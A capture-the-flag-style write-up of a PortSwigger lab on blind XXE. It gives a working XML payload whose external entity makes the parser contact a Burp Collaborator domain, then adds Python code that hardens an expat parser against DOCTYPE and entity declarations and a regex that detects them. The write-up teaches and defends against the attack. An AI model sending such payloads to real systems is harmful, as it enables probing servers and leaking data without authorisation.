apsyleg · 1 min read
#portswigger #xxe #web-security
Blind XXE with Out-of-Band Interaction
Lab
Blind XXE with out-of-band interaction · Practitioner
Solution
Given
This lab has a "Check stock" feature that parses XML input but does not display the result.
You can detect the blind XXE vulnerability by triggering out-of-band interactions with an external domain.
To solve the lab, use an external entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator.
Analyzing the task
The check-stock function parses XML but doesn't show the result in the response, so we can't read an expanded entity back directly. That means we need the out-of-band (OOB) technique: make the parser contact a host we control.
Exploitation
Find the Check stock function: a POST to /product/stock with XML in the body.
OK, let's straight away add an external entity pointing at our Burp Collaborator domain and send the request. Payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://l9vnzxbboknpu6p5dex776v9l0ryfo3d.oastify.com"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
Lands: Collaborator logs both the DNS lookup and the HTTP request.
Lab solved!
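The defensive side of the same lab, as an added example that is not part of the original post or of PortSwigger's lab code: a hardened stdlib parser for the stockCheck body that refuses any DOCTYPE or entity declaration (so a SYSTEM entity never gets the chance to trigger a DNS or HTTP lookup), plus a coarse body check of the kind you would put in a WAF rule or log search to spot XXE attempts. The function names, the sample bodies and the placeholder Collaborator hostname are constructed for this example.

```python
"""Hardened parsing and detection for the stockCheck XML body (added example)."""
import re
import xml.parsers.expat


class UnsafeXmlError(ValueError):
    """Raised when a body carries a DTD or entity declaration."""


def parse_stock_check(body: bytes) -> dict:
    """Parse <stockCheck><productId>..</productId><storeId>..</storeId></stockCheck>
    with an expat parser whose DTD-related handlers abort immediately.

    A stock-check body has no legitimate reason to declare a DTD, so the
    DOCTYPE handler rejects the document before any entity is even declared,
    let alone dereferenced. The external-entity handler is a second line of
    defence that refuses to fetch a SYSTEM URI under any circumstances.
    """
    parser = xml.parsers.expat.ParserCreate()
    fields: dict = {}
    stack: list = []  # open element names, innermost last

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXmlError("DOCTYPE declaration rejected")

    def on_entity_decl(*_args):
        raise UnsafeXmlError("entity declaration rejected")

    def on_external_entity(context, base, system_id, public_id):
        raise UnsafeXmlError("external entity %r rejected" % (system_id,))

    def on_start(name, attrs):
        stack.append(name)
        if name in ("productId", "storeId"):
            fields[name] = ""

    def on_end(name):
        stack.pop()

    def on_chars(data):
        # expat may deliver text in several chunks; concatenate them.
        if stack and stack[-1] in fields:
            fields[stack[-1]] += data

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = on_chars
    # Exceptions raised inside expat handlers propagate out of Parse().
    parser.Parse(body, True)

    # Allow-list the values as well: both IDs are expected to be integers.
    for key in ("productId", "storeId"):
        if not fields.get(key, "").strip().isdigit():
            raise ValueError("%s missing or not numeric" % key)
    return {k: v.strip() for k, v in fields.items()}


def is_rejected(body: bytes) -> bool:
    """True if the hardened parser refuses the body as unsafe XML."""
    try:
        parse_stock_check(body)
    except UnsafeXmlError:
        return True
    return False


# Coarse marker for WAF rules or log searches: any DTD or entity declaration
# in a stock-check body is suspicious, whatever URI it points at.
_DTD_MARKERS = re.compile(rb"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)


def body_has_dtd(body: bytes) -> bool:
    """Flag request bodies that declare a DTD or an entity."""
    return _DTD_MARKERS.search(body) is not None


# Constructed sample bodies: a normal stock check, and the OOB payload shape
# from this writeup with the Collaborator hostname replaced by a placeholder.
SAFE_BODY = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b"<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>"
)
XXE_BODY = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://collaborator-placeholder.example/"> ]>'
    b"<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>"
)

if __name__ == "__main__":
    print(parse_stock_check(SAFE_BODY))       # {'productId': '1', 'storeId': '1'}
    print(is_rejected(XXE_BODY))              # True
    print(body_has_dtd(SAFE_BODY), body_has_dtd(XXE_BODY))  # False True
```

The DOCTYPE handler fires at `<!DOCTYPE foo [`, before expat has read the `<!ENTITY` declaration, so the parser never holds the SYSTEM URI, and the Collaborator domain sees no DNS lookup at all. If a framework forces you to use a parser that cannot be configured this way, `body_has_dtd` on the raw request body is the minimum gate to put in front of it.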